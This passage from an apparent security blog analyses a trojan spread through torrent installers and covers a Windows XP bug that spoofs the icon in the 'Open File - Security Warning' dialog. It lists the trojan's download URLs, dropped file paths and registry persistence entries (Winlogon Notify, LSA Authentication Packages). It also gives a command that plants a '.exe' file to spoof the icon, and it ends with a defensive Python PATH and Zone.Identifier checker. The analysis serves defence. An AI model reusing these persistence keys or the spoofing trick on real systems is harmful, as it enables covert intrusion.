0pt; float: left; cursor: pointer;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SMw_wuiRZ_I/AAAAAAAAAA8/FeZLU07Vb3E/s400/antiviruses2.JPG" alt="" id="BLOGGER_PHOTO_ID_5245637772337833970" border="0" /></a><br /><p><br />Well, they didn't :)<br />This is really funny to see that all you need to be "a top notch" malicious software is to just download WinRar and 
NSIS (Nullsoft Scriptable Install System) and create a Windows XP SP3 installation torrent; this is after 20 years of Anti-Virus security technology by a 7 billion dollar a year market.<br /><br />More funny stuff! The author of this virus was so lazy he just put in a list of the relative paths to the real setup executables of all the software he would infect and share on the internet, so the "setup.exe" he made will now try to execute a list of files of which only one should exist in your infected download :)<br />Some Examples:<br />\Game\wws98.exe<br />\WinRoute.exe<br />\GAME\LBWIN.EXE<br />\vs.exe<br />\Pandora.exe<br /><br />Be aware of what you download! It seems the best way to tell if it's an infected setup is to right click setup.exe and see if WinRar suggests "Extract To" (I am joking of course)<br /></p><p>The executed "file.exe" downloaded http://www.cxgr.com/3913574.exe, which is also an NSIS file and also a Trojan Downloader; my upload was the first time it was scanned on virustotal and you can guess the results:<br /></p><a href="http://2.bp.blogspot.com/_18YBLFP2tdA/SMxQ9fcyWOI/AAAAAAAAABE/P8oCFXCz_m0/s1600-h/antiviruses3.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SMxQ9fcyWOI/AAAAAAAAABE/P8oCFXCz_m0/s400/antiviruses3.JPG" alt="" id="BLOGGER_PHOTO_ID_5245656683324266722" border="0" /></a><p>What's really annoying me in this result is that the 3-4 Anti-Viruses that "supply a solution" above and detect the downloader DO NOT DETECT THE CONSTANT FILE IT DOWNLOADS, which means all the malware creator needs to do is modify the downloader or use a new one and there he goes again, infecting the entire planet and getting away with it!</p><p>Now 
"3913574.exe" downloaded http://www.cxgr.com/Setup_ver1.1400.0.exe<br />which is not packed by a known packer and isn't even identified as having a "packed entropy" by PEiD. It's a small application compiled by MS VC++ 7/8, 72 KB.<br />Its import table is quite limited and it calls GetProcAddress to get:<br />SetProcessPriorityBoost, WriteFile, GetEnvironmentVariableA, InternetOpenA, ExitProcess, GetTempPathA, InternetCloseHandle, CloseHandle, TerminateProcess, CreateFileA, DeleteFileA, SHChangeNotify, lstrcpyA, lstrcpyn, InternetGetConnectedState, GetAdaptersInfo, SetThreadPriority, GetModuleFileNameA, Sleep, ShellExecuteEx, InternetOpenUrlA<br /><br />Of course the strings are not plaintext, and it's not XOR either, how refreshing!!! It's a nice piece of code that identifies a header byte and multiplies the bytes by a word chosen per this header; maybe it is some kind of small compression.<br /></p><p>Now more than 10 executables are downloaded onto your system, some are detected by some AVs and some are not; they are packed with Armadillo v1.71 and some with ASPack v2.12<br />http://www.virustotal.com/he/analisis/7e8af73b605c1c82d0d990d204e12559<br />http://www.virustotal.com/he/analisis/f60edd90989cd53b73dfedd4df4d3aec<br />http://www.virustotal.com/he/analisis/6f0ab356e2bd80d4845fdb5ebbe619e1<br />http://www.virustotal.com/he/analisis/11232e1cf52a2c68b4f28815e7eedb60<br /><br />These executables are saved in:<br />%programfiles%\MicroAV<br /></p><ul><li>MicroAV.exe<br /></li></ul><p>%windir%\PCHealthCenter<br /></p><ul><li>1.exe, 2.exe, 3.exe, 4.exe, 5.exe, 7.exe<br /></li></ul><p>and of course to %windir%\system32<br /></p><ul><li>MicroAV.cpl, apgambly.dll, biqwetjd.dll and three DLLs with names made of 8 random [a-zA-Z0-9] characters<br /></li></ul>About 5-6 entries are added to registry->Run to load the processes that bug you in the system tray. 
This home-made-looking trojan is much more advanced than it appears to be...<br />Clearly these evil guys are advancing and they don't stop at loading from registry->Run;<br />they start using advanced loading methods such as registering as Authentication Packages to be loaded inside LSA and as logon notification DLLs to be loaded inside winlogon.exe (which is one of the best places to be in, since it cannot be terminated)<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\yayxuSIb]<br />"Asynchronous"=dword:00000001<br />"DllName"="yayxuSIb.dll"<br />"Impersonate"=dword:00000000<br />"Logon"="o"<br />"Logoff"="f"<br /><br />[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa]<br />"Authentication Packages"=hex(7):6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,43,\<br />00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,73,00,79,00,\<br />73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,6c,00,6a,00,4a,00,44,00,57,00,4d,\<br />00,64,00,41,00,00,00,00,00<br /><br /><span style="font-weight: bold;">Windows "Open File - Security Warning" Dialog</span> (Rafel Ivgi, 2008-09-07)<br />Not so long ago, I found one of the most bizarre bugs. It seems there is some kind of bug in the parsing of the command line read from the registry for file types handled by explorer.exe. This was checked on Windows XP SP3 but I guess it exists in SP2 too. This bug allows controlling the icon which appears in the "Open File - Security Warning" dialog for all the executables downloaded from the internet.<br /><br /><div><div><div><div>Each time you download a file from the internet/intranet to a drive with the NTFS file system, an ADS (Alternate Data Stream) ini file called "Zone.Identifier" is created. 
This hidden ini file specifies the zone the file came from; this can be the internet or the local network (intranet).</div><div><br /></div><div>You can see it using the following in cmd: <blockquote>more &lt; exe_from_internet.exe:Zone.Identifier</blockquote><div>The ini will be printed to the screen:<br />[ZoneTransfer]<br />ZoneId=3</div><div><br />When you "click" (ShellExecute) a file whose handler is explorer.exe, the Zone.Identifier is checked and if the zone is 3 (internet) the following screen appears:</div><div><br /></div><div><a href="http://2.bp.blogspot.com/_18YBLFP2tdA/SMRlMZeiY8I/AAAAAAAAAAM/7yBfG1I91ZI/s1600-h/regular.JPG"><img id="BLOGGER_PHOTO_ID_5243427129837904834" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SMRlMZeiY8I/AAAAAAAAAAM/7yBfG1I91ZI/s400/regular.JPG" border="0" /></a> </div><div>Well, it appears that each time you try to open an executable that came from the internet, the icon that will appear in this dialog will be parsed from an executable file called ".exe" or "%1" in any directory of the "PATH" environment variable of the user running explorer.exe, for example:<br /><br />c:\.exe<br />c:\windows\.exe</div><div><a href="http://1.bp.blogspot.com/_18YBLFP2tdA/SMRnNJWKAsI/AAAAAAAAAAU/lR9l3TIsSyg/s1600-h/bug.JPG"><img id="BLOGGER_PHOTO_ID_5243429341710910146" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://1.bp.blogspot.com/_18YBLFP2tdA/SMRnNJWKAsI/AAAAAAAAAAU/lR9l3TIsSyg/s400/bug.JPG" border="0" /></a></div><div>You can create such a file using "cmd /c type c:\windows\system32\calc.exe &gt; c:\windows\.exe"<br />or write code that uses CreateFile :)</div><div><br />The file request is FASTIO_NETWORK_QUERY_OPEN and the icon is cached in memory until the explorer.exe process is terminated. 
If you want to further explore this case, here is the call stack:</div><div><br /><a href="http://3.bp.blogspot.com/_18YBLFP2tdA/SMR3H_NF-vI/AAAAAAAAAAs/Vu-K6aN03MU/s1600-h/callstack.GIF"><img id="BLOGGER_PHOTO_ID_5243446845275241202" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" height="477" alt="" src="http://3.bp.blogspot.com/_18YBLFP2tdA/SMR3H_NF-vI/AAAAAAAAAAs/Vu-K6aN03MU/s400/callstack.GIF" width="417" border="0" /></a> </div></div></div></div></div>
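<br /><br />As an added defender-side example (not from the post), the Python below does two checks for the behaviour described above: it looks in every PATH directory for a stray file named ".exe" or "%1" (the file explorer.exe would read the warning-dialog icon from), and it parses the Zone.Identifier ini text to report which zone a download is marked with. The temporary directories and the stream text are constructed for the demo; on a real machine you would pass os.environ["PATH"] and the bytes read from file.exe:Zone.Identifier.<br />

```python
"""Added example: PATH audit for a planted '.exe'/'%1' icon-shadow file and a
Zone.Identifier parser. Sample directories and stream text are constructed."""
import configparser
import os
import tempfile

# URLZONE_* ids as written into the ZoneId field of Zone.Identifier.
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}


def find_shadow_files(path_value, names=(".exe", "%1"), sep=os.pathsep):
    """Return full paths of files with one of `names` in any PATH directory."""
    hits = []
    for directory in filter(None, path_value.split(sep)):
        for name in names:
            candidate = os.path.join(directory, name)
            if os.path.isfile(candidate):
                hits.append(candidate)
    return hits


def parse_zone_identifier(text):
    """Parse Zone.Identifier ini text; return (zone_id, zone_name) or None
    when the stream carries no [ZoneTransfer]/ZoneId entry."""
    parser = configparser.ConfigParser()
    parser.read_string(text)
    if not parser.has_option("ZoneTransfer", "ZoneId"):
        return None
    zone_id = parser.getint("ZoneTransfer", "ZoneId")
    return zone_id, ZONE_NAMES.get(zone_id, "unknown")


def demo():
    """Constructed scenario: one clean PATH directory, one holding a planted
    '.exe'; plus a constructed Zone.Identifier marking an Internet download."""
    with tempfile.TemporaryDirectory() as root:
        clean = os.path.join(root, "clean")
        dirty = os.path.join(root, "dirty")
        os.makedirs(clean)
        os.makedirs(dirty)
        with open(os.path.join(dirty, ".exe"), "wb") as fh:
            fh.write(b"MZ")  # placeholder bytes, not a real executable
        hits = find_shadow_files(os.pathsep.join([clean, dirty]))
        flagged_dirs = [os.path.basename(os.path.dirname(h)) for h in hits]
    zone = parse_zone_identifier("[ZoneTransfer]\nZoneId=3\n")
    return flagged_dirs, zone


if __name__ == "__main__":
    print(demo())
```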